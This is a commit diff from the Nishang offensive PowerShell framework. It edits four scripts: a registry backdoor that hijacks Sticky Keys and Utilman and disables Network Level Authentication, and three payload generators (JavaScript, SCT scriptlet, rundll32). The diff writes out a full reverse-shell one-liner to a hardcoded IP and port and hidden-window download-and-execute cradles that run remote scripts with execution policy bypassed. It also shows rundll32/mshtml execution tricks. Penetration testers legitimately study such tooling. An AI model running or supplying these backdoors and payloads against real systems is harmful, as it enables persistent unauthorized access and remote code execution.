Minor Changes

samratashok · Mar 20, 2017 · e339693 · e339693
1 parent 9ac8207
commit e339693
Show file tree

Hide file tree

Showing 4 changed files with 64 additions and 16 deletions.
diff --git a/Backdoors/Add-RegBackdoor.ps1 b/Backdoors/Add-RegBackdoor.ps1
@@ -1,6 +1,29 @@
-
 function Add-RegBackdoor
 {
+<#
+.SYNOPSIS
+Nishang Script which could set Debugger registry keys for Sticky Keys (sethc.exe) and Utilman (utilman.exe) to remotely execute commands and scripts.
+
+.DESCRIPTION
+This script can be used to set Debugger keys for  Sticky Keys (sethc.exe) and Utilman (utilman.exe). 
+The payload gets executed when on a locaked machine either Shift key is pressed five times or Windows Key + U is pressed. 
+The payloads can be launched remotely from RDP login screen as well if Network Level Authentication (NLA) is disabled. The script
+disables NLA by modifying the registry of a target box.
+
+The script needs to be executed from an elevated shell. 
+
+.PARAMETER Payload
+Payload which you want execute on the target. cmd.exe is the default payload.
+
+.EXAMPLE
+PS > Add-RegBackdoor
+Use above command to use the default payload cmd.exe
+
+.LINK
+https://github.com/samratashok/nishang
+#>
+
+
     [CmdletBinding()] Param(
         [Parameter(Position = 0, Mandatory = $False)]
         [String]

diff --git a/Client/Out-JS.ps1 b/Client/Out-JS.ps1
@@ -24,19 +24,24 @@ Path to the directory where the files would be saved. Default is the current dir
 .EXAMPLE
 PS > Out-JS -PayloadURL http://192.168.230.1/Invoke-PowerShellUdp.ps1 -Arguments "Invoke-PowerShellUdp -Reverse -IPAddress 192.168.230.154 -Port 53"
 
-Use above when you want to use the default payload, which is a powershell download and execute one-liner. A file 
+Use above when you want to use the payload which is a powershell download and execute one-liner. A file 
 named "Style.js" would be generated in the current directory.
 
-
+.EXAMPLE
 PS > Out-JS -PayloadURL http://192.168.230.1/Powerpreter.psm1 -Arguments "Get-Information;Get-Wlan-Keys"
 
 Use above command for multiple payloads.
 
-
-PS > Out-JS -Payload "`$sm=(New-Object Net.Sockets.TCPClient('192.168.230.154',443)).GetStream();[byte[]]`$bt=0..65535|%{0};while((`$i=`$sm.Read(`$bt, 0, `$bt.Length)) -ne 0){;`$d=(New-Object Text.ASCIIEncoding).GetString(`$bt,0, `$i);`$sb=(iex `$d 2>&1 | Out-String );`$sb2=`$sb + 'PS ' + (pwd).Path + '> ';`$sb=([text.encoding]::ASCII).GetBytes(`$sb2);`$sm.Write(`$sb,0,`$sb.Length);`$sm.Flush()}"
+.EXAMPLE
+PS > Out-JS -Payload "powershell.exe -w h -nologo -noprofile -ep bypass `$sm=(New-Object Net.Sockets.TCPClient('192.168.230.154',443)).GetStream();[byte[]]`$bt=0..65535|%{0};while((`$i=`$sm.Read(`$bt, 0, `$bt.Length)) -ne 0){;`$d=(New-Object Text.ASCIIEncoding).GetString(`$bt,0, `$i);`$sb=(iex `$d 2>&1 | Out-String );`$sb2=`$sb + 'PS ' + (pwd).Path + '> ';`$sb=([text.encoding]::ASCII).GetBytes(`$sb2);`$sm.Write(`$sb,0,`$sb.Length);`$sm.Flush()}"
 
 Use above for a Reverse PowerShell Session. Note that there is no need of download-execute in this case.
 
+.EXAMPLE
+PS > Out-JS -Payload "calc.exe"
+
+Use above for executing a custom payload.
+
 .LINK
 http://www.labofapenetrationtester.com/2016/05/practical-use-of-javascript-and-com-for-pentesting.html
 https://github.com/samratashok/nishang
@@ -62,15 +67,14 @@ https://github.com/samratashok/nishang
     )
 
     #Check if the payload has been provided by the user
-    if(!$Payload)
+    if($PayloadURL)
     {
-        $Payload = "IEX ((New-Object Net.WebClient).DownloadString('$PayloadURL'));$Arguments"
+        $Payload = "powershell -w h -nologo -noprofile -ep bypass IEX ((New-Object Net.WebClient).DownloadString('$PayloadURL'));$Arguments"
     }  
 
     $cmd = @"
-ps = 'powershell.exe -w h -nologo -noprofile -ep bypass ';
 c = "$Payload";
-r = new ActiveXObject("WScript.Shell").Run(ps + c,0,true);
+r = new ActiveXObject("WScript.Shell").Run(c,0,true);
 "@
 
     Out-File -InputObject $cmd -FilePath $OutputPath -Encoding default

diff --git a/Client/Out-SCT.ps1 b/Client/Out-SCT.ps1
@@ -70,7 +70,7 @@ https://github.com/samratashok/nishang
     {
         $Payload = "IEX ((New-Object Net.WebClient).DownloadString('$PayloadURL'));$Arguments"
     }  
-
+    #Below code comes from https://gist.github.com/subTee/24c7d8e1ff0f5602092f58cbb3f7d302
     $cmd = @"
 <?XML version="1.0"?>
 <scriptlet>
@@ -79,16 +79,32 @@ https://github.com/samratashok/nishang
     classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
 	<!-- Proof Of Concept - Casey Smith @subTee -->
 	<!--  License: BSD3-Clause -->
-	<script language="JScript">
+
+    <script language="JScript">
 		<![CDATA[
 	
 			ps = 'powershell.exe -w h -nologo -noprofile -ep bypass ';
             c = "$Payload";
             r = new ActiveXObject("WScript.Shell").Run(ps + c,0,true);
 	
+		]]>
+	</script>
+    </registration>
+
+    <public>
+    <method name="Exec"></method>
+    </public>
+	<script language="JScript">
+		<![CDATA[
+	        
+            function Exec()
+            {
+			    ps = 'powershell.exe -w h -nologo -noprofile -ep bypass ';
+                c = "$Payload";
+                r = new ActiveXObject("WScript.Shell").Run(ps + c,0,true);
+	        }
 		]]>
 </script>
-</registration>
 </scriptlet>
 "@
 

diff --git a/Execution/Out-RundllCommand.ps1 b/Execution/Out-RundllCommand.ps1
@@ -20,9 +20,9 @@ The port on which the connection is establised.
 .EXAMPLE
 PS > Out-RundllCommand -PayloadURL http://192.168.230.1/Invoke-PowerShellUdp.ps1 -Arguments "Invoke-PowerShellUdp -Reverse -IPAddress 192.168.230.154 -Port 53"
 
-Use above when you want to use the default payload, which is a powershell download and execute one-liner.
-
+Use above when you want to use the payload which is a powershell download and execute one-liner.
 
+.EXAMPLE
 # netcat -lvp 443
 
 Start a netcat/Powercat listener.
@@ -31,6 +31,11 @@ PS > Out-RundllCommand -Reverse -IPAddress 192.168.230.1 -Port 443
 
 Use above command to get a reverse PowerShell session on the target.
 
+.EXAMPLE
+PS > Out-RundllCommand -Payload "calc.exe"
+
+Use above for executing a custom payload.
+
 
 .LINK
 http://www.labofapenetrationtester.com/2016/05/practical-use-of-javascript-and-com-for-pentesting.html
@@ -86,9 +91,9 @@ https://github.com/samratashok/nishang
         #Check if the payload url has been provided by the user
         if($PayloadURL)
         {
-            $Payload = "IEX ((New-Object Net.WebClient).DownloadString('$PayloadURL'));$Arguments"
+            $Payload = "powershell -w h -nologo -noprofile -ep bypass IEX ((New-Object Net.WebClient).DownloadString('$PayloadURL'));$Arguments"
         }
-        $cmd = "rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();r=new%20ActiveXObject(""WScript.Shell"").run(""powershell -w h -nologo -noprofile -ep bypass $Payload"",0,true);"
+        $cmd = "rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();r=new%20ActiveXObject(""WScript.Shell"").run(""$Payload"",0,true);"
     }  
     Write-Output $cmd
     Write-Warning "Copy the command from the $OutputPath file to avoid errors."